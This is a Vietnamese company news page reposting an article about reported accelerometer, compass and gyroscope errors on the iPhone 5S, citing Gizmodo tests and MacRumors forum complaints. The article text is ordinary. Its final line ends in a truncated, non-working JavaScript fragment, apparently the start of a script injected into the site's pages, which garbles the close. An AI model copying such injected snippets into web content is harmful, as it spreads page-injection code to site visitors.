Thiết Kế Web, Dịch Vụ Seo, Marketing Online > Tin tức > Tin công nghệ > Người dùng phản ánh iPhone 5S dính lỗi nghiêm trọng

Người dùng phản ánh iPhone 5S dính lỗi nghiêm trọng

Theo phản ánh của một số người dùng, những ai đang sử dụng la bàn trên iPhone 5S để định hướng hoặc chơi game dựa trên tác động vật lý trên chiếc smartphone cao cấp nhất của Apple có thể sẽ gặp phải những lỗi nghiêm trọng bắt nguồn từ gia tốc kế.

Lỗi với gia tốc kế

iPhone 5S bị dính lỗi với chiếc la bàn

Nếu thông tin trên là đúng thì đây có thể sẽ là lỗi ảnh hưởng sâu rộng và nghiêm trọng hơn cả thảm họa Apple Maps khi ra mắt cùng với iPhone 5, hay là lỗi Anten trên iPhone 4.

Đã có nhiều sự phản ánh của người dùng ở khắp nơi trên thế giới về vấn đề của cảm biến gia tốc trên thiết bị, mặc dù họ chưa biết đây là lỗi của phần cứng hay phần mềm.

Các biên tập viên của tờ Gizmodo đã tiến hành kiểm tra để chỉ ra độ sai lệch của cảm biến gia tốc trên iPhone 5S so với iPhone 5.

Ứng dụng bị ảnh hưởng nhiều nhất bởi lỗi này chính là la bàn được tích hợp sẵn trên 5S. Mặc dù cùng chạy trên hệ điều hành iOS 7, nhưng la bàn của iPhone mới lại hiển thị sai lệch từ 8 đến 10 độ so với người tiền nhiệm của nó.

Việc chơi các loại game sử dụng các tác động vật lý như trò đua xe, hay các trò chơi đòi hỏi phải nghiêng máy để thực hiện thao tác cũng bị ảnh hưởng bởi cảm biến gia tốc này.

Các thành viên của Gizmodo đã thử nghiệm với game Real Racing 3 của EA, khi chơi ở mức cao hơn, không có bất kỳ tác động ngoại lực nào, gia tốc kế của iPhone 5S tự động nghiêng về bên trái, khiến chiếc xe trong trò chơi đã rẽ theo hướng đó.

Lỗi với con quay hồi chuyển

Người dùng thử nghiệm game trên iPhone 5S và iPhone 5 và có một sự khác biệt

Lỗi điều hướng của iPhone 5S không chỉ ảnh hưởng đến la bàn. Con quay hồi chuyển và ứng dụng đo độ nghiêng được tích hợp trên iOS 7 cũng gặp một số sai sót khi so sánh với iPhone 5.

Khi đặt trên cùng một mặt phẳng với người tiền nhiệm, con quay hồi chuyển trên 5S luôn hiển thị nghiêng 3 độ. Trong khi đó, với ứng dụng đo độ nghiêng vốn được dùng để kích hoạt điện thoại khi đặt nằm ngang trên không trung và nó sẽ tắt khi nghiêng từ 2 -3 độ.

Tại MacRumors, trang công nghệ chuyên về các tin tức liên quan đến Apple, một chủ đề phản ánh về lỗi cảm biến gia tốc của iPhone mới được mở từ 24/9 đến nay đã kéo dài 20 trang. Hàng trăm người dùng đã thảo luận về vấn đề này đã cho rằng đây là mỗi ở phần cứng của chiếc iPhone mới vì thực tế iPhone 5 chạy iOS 7 thì các ứng dụng không gặp các lỗi nêu trên.

Apple hiện vẫn chưa lên tiếng thừa nhận hay công khai bất cứ điều gì về vấn đề được phản ánh đối với chiếc smartphone cao cấp nhất. Liệu sẽ có một kịch bản kiểu như “sửa lỗi Anten iPhone bằng cách phát bao đựng miễn phí” sẽ diễn ra hay khả năng lạc quan hơn là một bản sửa lỗi phần mềm có thể giải quyết được vấn đề.

Cho dù lỗi xuất phát từ đâu thì cũng sẽ ảnh hưởng không hề nhỏ đến danh tiếng của con chip phụ M7, vốn là con chip được Apple giới thiệu là có khả năng tối ưu cho chuyển động, được tích hợp cảm biến gia tốc, cảm biến con quay hồi chuyển, la bàn và dữ liệu chính xác hơn. Lời mời chào này đã khiến người sử dụng iPhone 5S sẽ mủi lòng để tìm mua các ứng dụng như Nike FueBland hay Fibit.

Tuy nhiên, giờ đây hàng loạt thông tin các nhận rằng dữ liệu từ cảm biến gia tốc, la bàn, máy đo độ nghiêng hay con quay hồi chuyển của iPhone 5S hoạt động không chính xác như những gì mà nó quảng cáo. Điều này đã dẫn đến lỗi của các ứng dụng khác. (new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1”)+”= .write(‘